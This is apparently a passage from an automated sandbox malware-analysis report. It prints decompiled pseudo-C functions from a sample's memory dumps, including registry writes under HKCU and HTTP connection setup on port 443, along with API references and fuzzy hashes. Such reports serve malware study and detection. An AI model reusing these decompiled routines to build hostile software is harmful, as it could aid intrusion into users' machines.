                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  				_push( &_v16);
                                                                                                                                  				_push( &_v8);
                                                                                                                                  				_push(_t63);
                                                                                                                                  				_t64 = __imp__; // 0x6fa7fd20
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(0x20000013);
                                                                                                                                  				_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                  				if( *_t64() == 0) {
                                                                                                                                  					goto L11;
                                                                                                                                  				} else {
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					 *_t64( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
                                                                                                                                  					_t47 = E031A75F6(_v8 + 2);
                                                                                                                                  					_v20 = _t47;
                                                                                                                                  					if(_t47 == 0) {
                                                                                                                                  						_v12 = 8;
                                                                                                                                  					} else {
                                                                                                                                  						_push( &_v16);
                                                                                                                                  						_push( &_v8);
                                                                                                                                  						_push(_t47);
                                                                                                                                  						_push(0);
                                                                                                                                  						_push(0x16);
                                                                                                                                  						_push( *((intOrPtr*)(__esi + 0x18)));
                                                                                                                                  						if( *_t64() == 0) {
                                                                                                                                  							_v12 = GetLastError();
                                                                                                                                  						} else {
                                                                                                                                  							_v8 = _v8 >> 1;
                                                                                                                                  							 *((short*)(_v20 + _v8 * 2)) = 0;
                                                                                                                                  							_t65 = E031A75F6(_v8 + 1);
                                                                                                                                  							if(_t65 == 0) {
                                                                                                                                  								_v12 = 8;
                                                                                                                                  							} else {
                                                                                                                                  								wcstombs(_t65, _v20, _v8 + 1);
                                                                                                                                  								 *(__esi + 0xc) = _t65;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						E031A4AAB(_v20);
                                                                                                                                  					}
                                                                                                                                  					goto L12;
                                                                                                                                  				}
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A130E
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • wcstombs.NTDLL ref: 031A12DC
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A12F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AllocateHeapwcstombs
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 2631933831-3251738875
                                                                                                                                  • Opcode ID: 24143563aafb3a74f0b4d248c535f2de1b2e931577438ee54f04d896e7f89019
                                                                                                                                  • Instruction ID: cf6d0a94dd1ad803b112b7052fad742b015a61f7947ad6f1e5474646b310e14b
                                                                                                                                  • Opcode Fuzzy Hash: 24143563aafb3a74f0b4d248c535f2de1b2e931577438ee54f04d896e7f89019
                                                                                                                                  • Instruction Fuzzy Hash: C13109B9900A09FFDB14DFA9C980AAEB7B8FF0C315F144569E542E3250D7309A449B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A502E(void* __edx) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				int _v12;
                                                                                                                                  				WCHAR* _v16;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t23;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  				void* _t26;
                                                                                                                                  				intOrPtr _t32;
                                                                                                                                  				intOrPtr _t35;
                                                                                                                                  				void* _t37;
                                                                                                                                  				intOrPtr _t38;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  				void* _t45;
                                                                                                                                  				void* _t50;
                                                                                                                                  				void* _t52;
                                                                                                                                  
                                                                                                                                  				_t50 = __edx;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_t23 = E031A37AC(0,  &_v8); // executed
                                                                                                                                  				if(_t23 != 0) {
                                                                                                                                  					_v8 = 0;
                                                                                                                                  				}
                                                                                                                                  				_t24 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t4 = _t24 + 0x31aedc8; // 0x5bd9370
                                                                                                                                  				_t5 = _t24 + 0x31aed70; // 0x4f0053
                                                                                                                                  				_t26 = E031A4B28( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                  				_t45 = _t26;
                                                                                                                                  				if(_t45 == 0) {
                                                                                                                                  					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                  					_t45 = 8;
                                                                                                                                  					if(_v12 < _t45) {
                                                                                                                                  						_t45 = 1;
                                                                                                                                  						__eflags = 1;
                                                                                                                                  					} else {
                                                                                                                                  						_t32 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  						_t11 = _t32 + 0x31aedbc; // 0x5bd9364
                                                                                                                                  						_t48 = _t11;
                                                                                                                                  						_t12 = _t32 + 0x31aed70; // 0x4f0053
                                                                                                                                  						_t52 = E031A131E(_t11, _t12, _t11);
                                                                                                                                  						_t59 = _t52;
                                                                                                                                  						if(_t52 != 0) {
                                                                                                                                  							_t35 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  							_t13 = _t35 + 0x31aee06; // 0x30314549
                                                                                                                                  							_t37 = E031A117A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                                                                                                                                  							if(_t37 == 0) {
                                                                                                                                  								_t61 =  *0x31ad294 - 6;
                                                                                                                                  								if( *0x31ad294 <= 6) {
                                                                                                                                  									_t42 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  									_t15 = _t42 + 0x31aec12; // 0x52384549
                                                                                                                                  									E031A117A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							_t38 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  							_t17 = _t38 + 0x31aee00; // 0x5bd93a8
                                                                                                                                  							_t18 = _t38 + 0x31aedd8; // 0x680043
                                                                                                                                  							_t45 = E031A5DDA(_v8, 0x80000001, _t52, _t18, _t17);
                                                                                                                                  							HeapFree( *0x31ad270, 0, _t52);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0x31ad270, 0, _v16);
                                                                                                                                  				}
                                                                                                                                  				_t54 = _v8;
                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                  					E031A51BB(_t54);
                                                                                                                                  				}
                                                                                                                                  				return _t45;
                                                                                                                                  			}



















                                                                                                                                  APIs
                                                                                                                                  • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05BD9370,00000000,?,74E5F710,00000000,74E5F730), ref: 031A507D
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05BD93A8,?,00000000,30314549,00000014,004F0053,05BD9364), ref: 031A511A
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,031A54EF), ref: 031A512C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: 07b1a43f8c5c0425c5e1bb1ba31543b0d841e63968b6ceb6f438ee3cc5f901fe
                                                                                                                                  • Instruction ID: 50728fbe7f6a089ccf02d48565b2b4fb79a186afae7f209f2307349061462a40
                                                                                                                                  • Opcode Fuzzy Hash: 07b1a43f8c5c0425c5e1bb1ba31543b0d841e63968b6ceb6f438ee3cc5f901fe
                                                                                                                                  • Instruction Fuzzy Hash: E831C179900E08BFDB11EBA8ED84EAE7BBDFF0D742F180166E500AB110D7719A45DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,6E97C338,000008BB), ref: 6E8ED345
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileModuleName
                                                                                                                                  • String ID: 1$N
                                                                                                                                  • API String ID: 514040917-3127171972
                                                                                                                                  • Opcode ID: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction ID: 92d9c2a95a581243fc26319c9670bf7367607d88b09f3bb69790878a78ee42e5
                                                                                                                                  • Opcode Fuzzy Hash: e01c0125f54417ce094f99f143926840c8aab4021420303a4f29a0666aaf6396
                                                                                                                                  • Instruction Fuzzy Hash: B7F260F150C9B08ECF08CF69CA90A797BB2FF97305B14891AD5459A785E3B8D58CDB08
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(80000002), ref: 031A3DFD
                                                                                                                                  • SysAllocString.OLEAUT32(031A28D9), ref: 031A3E41
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A3E55
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A3E63
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 344208780-0
                                                                                                                                  • Opcode ID: 529ccc6c84822f2af1963bc2fe5a197c510df6acf0b548f23c00a75740308478
                                                                                                                                  • Instruction ID: def1a4b84e6caf01315d4f9e203fa761a7788b580907cf9e7040f9c45f6fca8d
                                                                                                                                  • Opcode Fuzzy Hash: 529ccc6c84822f2af1963bc2fe5a197c510df6acf0b548f23c00a75740308478
                                                                                                                                  • Instruction Fuzzy Hash: 19314F7A900609EFCB05DF98D8909AEBBB9FF0C341B24882EF515D7250D7309A91CFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 23%
                                                                                                                                  			E031A7749(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				void* _t34;
                                                                                                                                  				long _t36;
                                                                                                                                  				unsigned int _t37;
                                                                                                                                  				void* _t38;
                                                                                                                                  				intOrPtr _t39;
                                                                                                                                  				void* _t40;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  				intOrPtr _t45;
                                                                                                                                  				void* _t56;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				void* _t63;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				intOrPtr* _t66;
                                                                                                                                  				void* _t69;
                                                                                                                                  
                                                                                                                                  				_t66 = __esi;
                                                                                                                                  				_t63 = E031A1922(_t34, _a4);
                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                  					L18:
                                                                                                                                  					_t36 = GetLastError();
                                                                                                                                  				} else {
                                                                                                                                  					_t37 = GetVersion();
                                                                                                                                  					_t69 = _t37 - 6;
                                                                                                                                  					if(_t69 > 0) {
                                                                                                                                  						L5:
                                                                                                                                  						_a4 = 4;
                                                                                                                                  					} else {
                                                                                                                                  						if(_t69 != 0) {
                                                                                                                                  							L4:
                                                                                                                                  							_a4 = 0;
                                                                                                                                  						} else {
                                                                                                                                  							_t37 = _t37 >> 8;
                                                                                                                                  							if(_t37 > 2) {
                                                                                                                                  								goto L5;
                                                                                                                                  							} else {
                                                                                                                                  								goto L4;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					__imp__(_t63, _a4, 0, 0, 0); // executed
                                                                                                                                  					 *(_t66 + 0x10) = _t37;
                                                                                                                                  					_t38 = E031A4AAB(_t63);
                                                                                                                                  					if( *(_t66 + 0x10) == 0) {
                                                                                                                                  						goto L18;
                                                                                                                                  					} else {
                                                                                                                                  						_t39 = E031A1922(_t38,  *_t66);
                                                                                                                                  						_v8 = _t39;
                                                                                                                                  						if(_t39 == 0) {
                                                                                                                                  							goto L18;
                                                                                                                                  						} else {
                                                                                                                                  							_t65 = __imp__; // 0x6fa7f5a0
                                                                                                                                  							if(_a8 == 0) {
                                                                                                                                  								L10:
                                                                                                                                  								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
                                                                                                                                  								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
                                                                                                                                  								_t40 = E031A4AAB(_v8);
                                                                                                                                  								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
                                                                                                                                  									goto L18;
                                                                                                                                  								} else {
                                                                                                                                  									_a4 = 0x800100;
                                                                                                                                  									_t56 = E031A1922(_t40,  *((intOrPtr*)(_t66 + 4)));
                                                                                                                                  									if(_t56 == 0) {
                                                                                                                                  										goto L18;
                                                                                                                                  									} else {
                                                                                                                                  										_t42 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  										_t19 = _t42 + 0x31ae758; // 0x450047
                                                                                                                                  										_t43 = _t19;
                                                                                                                                  										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
                                                                                                                                  										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
                                                                                                                                  										E031A4AAB(_t56);
                                                                                                                                  										_t45 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                                                                  										if(_t45 == 0) {
                                                                                                                                  											goto L18;
                                                                                                                                  										} else {
                                                                                                                                  											_t57 = 4;
                                                                                                                                  											_v12 = _t57;
                                                                                                                                  											__imp__(_t45, 0x1f,  &_a4,  &_v12);
                                                                                                                                  											if(_t45 != 0) {
                                                                                                                                  												_a4 = _a4 | 0x00000100;
                                                                                                                                  												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
                                                                                                                                  											}
                                                                                                                                  											_push(_t57);
                                                                                                                                  											_push( &_a8);
                                                                                                                                  											_push(6);
                                                                                                                                  											_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                  											if( *_t65() == 0) {
                                                                                                                                  												goto L18;
                                                                                                                                  											} else {
                                                                                                                                  												_push(_t57);
                                                                                                                                  												_push( &_a8);
                                                                                                                                  												_push(5);
                                                                                                                                  												_push( *((intOrPtr*)(_t66 + 0x18)));
                                                                                                                                  												if( *_t65() == 0) {
                                                                                                                                  													goto L18;
                                                                                                                                  												} else {
                                                                                                                                  													_t36 = 0;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
                                                                                                                                  								if(_t39 == 0) {
                                                                                                                                  									goto L18;
                                                                                                                                  								} else {
                                                                                                                                  									goto L10;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t36;
                                                                                                                                  			}





















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A1922: lstrlen.KERNEL32(?,00000000,05BD9B38,00000000,031A74FF,05BD9D16,?,?,?,?,?,69B25F44,00000005,031AD00C), ref: 031A1929
                                                                                                                                    • Part of subcall function 031A1922: mbstowcs.NTDLL ref: 031A1952
                                                                                                                                    • Part of subcall function 031A1922: memset.NTDLL ref: 031A1964
                                                                                                                                  • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,031A544C,00000000,00000000,05BD9618,?,?,031A2A8A,?,05BD9618,0000EA60), ref: 031A7764
                                                                                                                                  • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,031A544C,00000000,00000000,05BD9618,?,?,031A2A8A,?,05BD9618,0000EA60), ref: 031A788F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 4097109750-3251738875
                                                                                                                                  • Opcode ID: dc0af5266dceeda72411b410287ff41068bc620b1f64d13b94cb07be7dc5c4f8
                                                                                                                                  • Instruction ID: 3baa4934ad544aa569e94f967165b8baa05491d7314517eda94c74a64b99675c
                                                                                                                                  • Opcode Fuzzy Hash: dc0af5266dceeda72411b410287ff41068bc620b1f64d13b94cb07be7dc5c4f8
                                                                                                                                  • Instruction Fuzzy Hash: 7941537A100A05BFDB25DFE8DC85EAA7BBDEB0C782F044529F64295090D771DA84DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A117A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void* _t16;
                                                                                                                                  				short _t19;
                                                                                                                                  				void* _t22;
                                                                                                                                  				void* _t24;
                                                                                                                                  				void* _t25;
                                                                                                                                  				short* _t26;
                                                                                                                                  
                                                                                                                                  				_t24 = __edx;
                                                                                                                                  				_t25 = E031A1922(_t11, _a12);
                                                                                                                                  				if(_t25 == 0) {
                                                                                                                                  					_t22 = 8;
                                                                                                                                  				} else {
                                                                                                                                  					_t26 = _t25 + _a16 * 2;
                                                                                                                                  					 *_t26 = 0; // executed
                                                                                                                                  					_t16 = E031A9371(__ecx, _a4, _a8, _t25); // executed
                                                                                                                                  					_t22 = _t16;
                                                                                                                                  					if(_t22 == 0) {
                                                                                                                                  						GetSystemTimeAsFileTime( &_v12);
                                                                                                                                  						_t19 = 0x5f;
                                                                                                                                  						 *_t26 = _t19;
                                                                                                                                  						_t22 = E031A4A6D(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
                                                                                                                                  					}
                                                                                                                                  					HeapFree( *0x31ad270, 0, _t25);
                                                                                                                                  				}
                                                                                                                                  				return _t22;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A1922: lstrlen.KERNEL32(?,00000000,05BD9B38,00000000,031A74FF,05BD9D16,?,?,?,?,?,69B25F44,00000005,031AD00C), ref: 031A1929
                                                                                                                                    • Part of subcall function 031A1922: mbstowcs.NTDLL ref: 031A1952
                                                                                                                                    • Part of subcall function 031A1922: memset.NTDLL ref: 031A1964
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,05BD9364), ref: 031A11B2
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,05BD9364), ref: 031A11E0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1500278894-8415677
                                                                                                                                  • Opcode ID: 8227d61cfa7224e4efca64fd9c854001976f195bf72daae1b299eadef43c8073
                                                                                                                                  • Instruction ID: 9ac92e96063ed2d18d1f3b804adb5273778dd08a3769d1fa2be8af743fa86bc2
                                                                                                                                  • Opcode Fuzzy Hash: 8227d61cfa7224e4efca64fd9c854001976f195bf72daae1b299eadef43c8073
                                                                                                                                  • Instruction Fuzzy Hash: 7201843A210A09BBDB21AFA9DC44EAF7B79FF8D755F000026FA409A190DB71D954D760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 47%
                                                                                                                                  			E031A5141(char* _a4, char** _a8) {
                                                                                                                                  				char* _t7;
                                                                                                                                  				char* _t11;
                                                                                                                                  				char* _t14;
                                                                                                                                  				char* _t16;
                                                                                                                                  				char* _t17;
                                                                                                                                  				char _t18;
                                                                                                                                  				signed int _t20;
                                                                                                                                  				signed int _t22;
                                                                                                                                  
                                                                                                                                  				_t16 = _a4;
                                                                                                                                  				_push(0x20);
                                                                                                                                  				_t20 = 1;
                                                                                                                                  				_push(_t16);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t7 = StrChrA();
                                                                                                                                  					if(_t7 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t20 = _t20 + 1;
                                                                                                                                  					_push(0x20);
                                                                                                                                  					_push( &(_t7[1]));
                                                                                                                                  				}
                                                                                                                                  				_t11 = E031A75F6(_t20 << 2);
                                                                                                                                  				_a4 = _t11;
                                                                                                                                  				if(_t11 != 0) {
                                                                                                                                  					StrTrimA(_t16, 0x31ac2a4); // executed
                                                                                                                                  					_t22 = 0;
                                                                                                                                  					do {
                                                                                                                                  						_t14 = StrChrA(_t16, 0x20);
                                                                                                                                  						if(_t14 != 0) {
                                                                                                                                  							 *_t14 = 0;
                                                                                                                                  							do {
                                                                                                                                  								_t14 =  &(_t14[1]);
                                                                                                                                  								_t18 =  *_t14;
                                                                                                                                  							} while (_t18 == 0x20 || _t18 == 9);
                                                                                                                                  						}
                                                                                                                                  						_t17 = _a4;
                                                                                                                                  						 *(_t17 + _t22 * 4) = _t16;
                                                                                                                                  						_t22 = _t22 + 1;
                                                                                                                                  						_t16 = _t14;
                                                                                                                                  					} while (_t14 != 0);
                                                                                                                                  					 *_a8 = _t17;
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,00000000,05BD95AC,031A5390,?,031A935C,?,05BD95AC,?,031A5390), ref: 031A515D
                                                                                                                                  • StrTrimA.SHLWAPI(?,031AC2A4,00000002,?,031A935C,?,05BD95AC,?,031A5390), ref: 031A517B
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,?,031A935C,?,05BD95AC,?,031A5390), ref: 031A5186
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Trim
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3043112668-0
                                                                                                                                  • Opcode ID: a0b5f44fcc6ce45c5123d3b24e7e6b85eae26dc35cabc53f391d2e58ac6522dc
                                                                                                                                  • Instruction ID: 596136b402f62ce55b132f802e452708c3e9e71bb9973eb417040da650194c75
                                                                                                                                  • Opcode Fuzzy Hash: a0b5f44fcc6ce45c5123d3b24e7e6b85eae26dc35cabc53f391d2e58ac6522dc
                                                                                                                                  • Instruction Fuzzy Hash: 3001B535308B466FD7219A6E8C54F777B9EEF8E246F094011B995CB242D770C842C6A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 32%
                                                                                                                                  			E031A1F72(intOrPtr _a4, signed int _a8) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				void* _t14;
                                                                                                                                  				long _t15;
                                                                                                                                  				char* _t17;
                                                                                                                                  				intOrPtr* _t19;
                                                                                                                                  				signed int _t22;
                                                                                                                                  
                                                                                                                                  				_t19 = __imp__; // 0x6fa7e700
                                                                                                                                  				_t22 =  ~_a8;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				asm("sbb esi, esi");
                                                                                                                                  				while(1) {
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                                                                                                  					if(_t14 != 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t15 = GetLastError();
                                                                                                                                  					_v8 = _t15;
                                                                                                                                  					if(_t15 != 0x2f8f) {
                                                                                                                                  						if(_t15 == 0x2f00) {
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_v16 = 0x3300;
                                                                                                                                  						if(_v12 == 0) {
                                                                                                                                  							_t17 =  &_v16;
                                                                                                                                  							__imp__(_a4, 0x1f, _t17, 4);
                                                                                                                                  							if(_t17 == 0) {
                                                                                                                                  								_v8 = GetLastError();
                                                                                                                                  							} else {
                                                                                                                                  								_v12 = 1;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L9:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				goto L9;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 031A1F8F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,031A46B9,00000000,?,?), ref: 031A1FE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 1452528299-3251738875
                                                                                                                                  • Opcode ID: 409faa901fef452ca510924796c9d175d4a5dbd6dc2337f8d4c569687d4f5d37
                                                                                                                                  • Instruction ID: 19423913f97e527ae87c59a33c9fabf96ae06f4152ff94d2940db66b7e94f7ee
                                                                                                                                  • Opcode Fuzzy Hash: 409faa901fef452ca510924796c9d175d4a5dbd6dc2337f8d4c569687d4f5d37
                                                                                                                                  • Instruction Fuzzy Hash: BA015679904548FBDF10DFAAD848DAEBFBCEB8C752F108076E511E6145D7708688DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4AAB(void* _a4) {
                                                                                                                                  				char _t2;
                                                                                                                                  
                                                                                                                                  				_t2 = RtlFreeHeap( *0x31ad270, 0, _a4); // executed
                                                                                                                                  				return _t2;
                                                                                                                                  			}





                                                                                                                                  APIs
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp Download File
